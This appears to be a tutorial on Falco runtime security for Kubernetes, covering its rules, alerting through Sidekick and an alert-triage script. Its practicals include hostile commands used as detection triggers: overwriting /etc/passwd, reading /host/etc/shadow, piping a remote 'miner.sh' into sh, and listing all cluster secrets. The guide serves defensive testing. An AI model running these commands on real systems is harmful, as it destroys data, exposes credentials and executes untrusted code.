Falco provides runtime protection by continuously monitoring system calls inside Kubernetes nodes and containers. It detects suspicious behavior such as privilege escalation, file tampering, command execution inside containers, namespace escapes, and other anomaly patterns. Falco acts as the “intrusion detection system” for containerized workloads, enforcing real-time security visibility and alerting during runtime.
Understanding Falco Runtime Protection
Falco uses Linux kernel system calls (via eBPF or kernel module) to observe everything happening inside containers and nodes. It compares these actions against security rules to detect:
• abnormal behavior
• intrusion attempts
• privilege escalation
• unexpected process activity
• filesystem tampering
• network anomalies
• container breakouts
Falco enforces behavioral detection rather than static configuration checks.
How Falco Works Internally
Falco uses two core components:
System Call Capture
Falco captures syscalls using:
• eBPF probe (preferred)
• kernel module
These probes listen to:
• process creation
• file reads/writes
• network traffic
• capability usage
• mount operations
• exec events
• container metadata
This provides full runtime visibility.
Rules Engine
Falco evaluates events against rules. Rules describe conditions such as:
• unexpected shells
• writing to sensitive directories
• modifying binaries
• accessing host filesystem
• spawning processes in containers
• tampering with kubelet/cgroup files
• abusing capabilities
If a rule is triggered, Falco generates alerts.
Benefits in DevSecOps
Falco supports runtime DevSecOps by:
• detecting attacks after deployment
• providing behavioral monitoring
• enforcing least privilege runtime policies
• giving visibility into real container activity
• integrating with alerting and SIEM
• backing compliance requirements
Falco complements SAST, SCA, DAST, IAST, and PSS by monitoring the live environment.
What Falco Detects
Falco identifies runtime threats such as:
• exec of interactive shells (bash, sh)
• writing to /etc, /usr/bin, /proc
• modifying container binaries
• privilege escalation events
• use of sensitive capabilities (SYS_ADMIN, SYS_PTRACE)
• unexpected network connections
• crypto miner processes
• data exfiltration
• changes inside read-only root FS
• access to host paths
• creation of suspicious files
• Kubernetes API abuse
Falco rules are extremely flexible.
Falco Rules Overview
A Falco rule includes:
• condition (syscall + fields)
• filters (container checks, user IDs, capabilities)
• action (alert or log event)
• output format
Example rule structure:
- rule: Unexpected Shell
  desc: Detect shells starting inside containers
  # evt.dir = < matches the execve exit event, when proc.name already reflects the new process
  condition: evt.type = execve and evt.dir = < and container.id != host and proc.name in ("bash","sh")
  output: "Shell detected in container (%container.name) by (%proc.cmdline)"
  priority: WARNING
Rules allow deep process-level control.
Falco Sidekick
Falco Sidekick sends Falco alerts to:
• Slack
• Discord
• Teams
• Kafka
• Elasticsearch
• Loki
• Webhooks
• CloudWatch
This enables automated response pipelines.
Falco vs Other Tools
Falco vs SIGs (logs)
Falco is real-time; logs are reactive.
Falco vs Admission Controllers
Admission controllers act before runtime, at admission time; Falco monitors what actually happens at runtime.
Falco vs Network Policies
Falco detects violations, Network Policies enforce segmentation.
Falco vs eBPF Observability
Falco is security-oriented; observability tools are performance-oriented.
Falco Deployment Architecture
Falco runs as:
• DaemonSet
• eBPF probe
• sidecar agent
• host-based IDS
DaemonSet ensures one Falco instance per node.
Full-Length Practical Section
Hands-on runtime protection tasks to fully understand Falco.
Practical 1: Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco --namespace falco --create-namespace
Falco installs as a DaemonSet.
Practical 2: Verify Falco Pods
kubectl get pods -n falco
Ensure all nodes run a Falco agent.
Practical 3: Trigger a Test Alert
Exec into container:
kubectl exec -it app -- sh
Falco triggers "Unexpected Shell in Container" alert.
Practical 4: View Falco Logs
kubectl logs -n falco <falco-pod>
Alerts show real-time events.
Practical 5: Detect File Modification
Write file inside container:
echo test > /etc/passwd
Falco detects suspicious write attempts.
Practical 6: Detect Privilege Escalation
Run privileged command:
capsh --print
Falco triggers capability abuse alert.
Practical 7: Create Custom Rule
Create rule file:
apiVersion: v1
kind: ConfigMap
metadata:
  name: falco-rules
  namespace: falco
data:
  custom.rules: |
    - rule: No Exec in Data Path
      desc: prevent executing binaries in /data
      # evt.dir = < matches the execve exit event, when proc.exepath is the newly executed binary
      condition: evt.type = execve and evt.dir = < and proc.exepath startswith "/data"
      output: "Unexpected execution in data path: %proc.cmdline"
      priority: WARNING
Apply it to cluster.
Practical 8: Test Custom Rule
Run:
/data/script.sh
Falco detects execution.
Practical 9: Detect Kube API Abuse
Query sensitive API:
kubectl get secrets -A
If the Kubernetes audit event source (k8saudit plugin) and its rules are enabled, Falco flags the access.
Practical 10: Detect Sensitive File Reads
Try reading host file from container:
cat /host/etc/shadow
Falco detects host filesystem access.
Practical 11: Monitor Suspicious Network Traffic
Send traffic to external IP:
curl http://1.2.3.4
Falco triggers networking anomaly detection.
Practical 12: Detect Known Malware Processes
Run:
curl -L miner.sh | sh
Falco triggers crypto-mining rule.
Practical 13: Enable Sidekick
Install:
helm install falco-sidekick falcosecurity/falcosidekick --namespace falco
Alerts start flowing to integrated outputs.
Practical 14: Send Alerts to Slack
Configure webhook URL in values file.
Practical 15: Send Alerts to SIEM
Send alerts to:
• ELK
• Splunk
• Datadog
Enable via Sidekick.
Practical 16: Automate Response Using KEDA (optional)
Falco → Sidekick → KEDA → scale down deployment automatically on threat.
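The triage step such a pipeline performs on the alerts from Practical 4 (Falco JSON output, as Sidekick forwards it), as an added example that is not Falco's or Sidekick's own code: parse the alert stream, filter by priority, and pick the pods to quarantine. The sample alert lines are constructed; rule names follow the style of Falco's default ruleset.

```python
# Added example: triage Falco alerts emitted as JSON lines (json_output: true).
import json
from collections import Counter

# Falco priorities from most to least severe.
PRIORITY_RANK = {p: i for i, p in enumerate(
    ["Emergency", "Alert", "Critical", "Error", "Warning",
     "Notice", "Informational", "Debug"])}

# Constructed sample log: one non-JSON startup line plus three alerts.
SAMPLE_LOG = """
Falco startup line (constructed, not JSON) - the parser must skip it
{"output":"Notice A shell was spawned in a container","priority":"Notice","rule":"Terminal shell in container","time":"2024-01-01T10:00:00Z","source":"syscall","output_fields":{"container.id":"a1b2c3","container.name":"web","k8s.ns.name":"default","k8s.pod.name":"web-5f2a","proc.cmdline":"sh","user.name":"root"}}
{"output":"Error File below /etc opened for writing","priority":"Error","rule":"Write below etc","time":"2024-01-01T10:00:05Z","source":"syscall","output_fields":{"container.id":"d4e5f6","container.name":"app","k8s.ns.name":"default","k8s.pod.name":"app-7c9d","proc.cmdline":"sh","fd.name":"/etc/passwd","user.name":"root"}}
{"output":"Warning Privilege escalation on host","priority":"Warning","rule":"Host sudo to root (constructed)","time":"2024-01-01T10:00:09Z","source":"syscall","output_fields":{"container.id":"host","proc.cmdline":"sudo su -","user.name":"dev"}}
"""

def parse_alerts(text):
    """Return the JSON alerts in a Falco log; non-JSON lines are skipped."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            alerts.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return alerts

def at_or_above(alerts, min_priority):
    """Keep alerts whose priority is at least min_priority (e.g. 'Warning')."""
    limit = PRIORITY_RANK[min_priority]
    return [a for a in alerts if PRIORITY_RANK.get(a.get("priority"), 99) <= limit]

def pods_to_quarantine(alerts, min_priority="Warning"):
    """(namespace, pod) pairs from container alerts at or above min_priority.
    Host-level alerts (container.id == 'host') have no pod and are excluded."""
    pods = set()
    for a in at_or_above(alerts, min_priority):
        f = a.get("output_fields", {})
        if f.get("container.id") in (None, "host"):
            continue
        if f.get("k8s.ns.name") and f.get("k8s.pod.name"):
            pods.add((f["k8s.ns.name"], f["k8s.pod.name"]))
    return sorted(pods)

def rule_counts(alerts):
    """How often each rule fired; useful for spotting noisy rules to tune."""
    return Counter(a["rule"] for a in alerts)

if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_LOG)
    print(rule_counts(alerts))
    for ns, pod in pods_to_quarantine(alerts):
        # Response hook: label the pod so a deny-all NetworkPolicy isolates it (printed, not executed).
        print(f"kubectl label pod -n {ns} {pod} quarantine=true --overwrite")
```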
Practical 17: Detect Container Escape Attempts
Test accessing cgroup files:
cat /proc/1/cgroup
Non-root container attempts trigger alerts.
Practical 18: Monitor Node-Level Events
Falco observes:
• unexpected user creation
• kernel module loading
• host-level command execution
Simulate host command:
sudo su -
Falco logs escalation if configured.
Practical 19: Integrate Falco with Istio/Linkerd
Falco observes the sidecar containers and service-mesh traffic patterns alongside the application workloads.
Practical 20: Build Full Runtime Protection Architecture
Architecture includes:
• Falco as DaemonSet with eBPF
• custom rules for workloads
• Sidekick sending alerts to Slack, SIEM, or webhooks
• automated remediation (delete pods, quarantine nodes)
• Kubernetes-native threat detection
• file integrity monitoring
• privilege escalation detection
• Kube API audit monitoring
This creates a complete runtime security model for DevSecOps.
Intel Dump
• Falco uses eBPF or kernel module to monitor syscalls in real time
• detects suspicious behavior such as shells, file tampering, capability abuse, escapes
• rules define conditions and alerts
• deployed as DaemonSet for node-wide monitoring
• Sidekick enables alert forwarding to SIEM/SOC
• practicals include installation, testing alerts, privilege detection, custom rules, API abuse detection, network anomalies, and full runtime protection architecture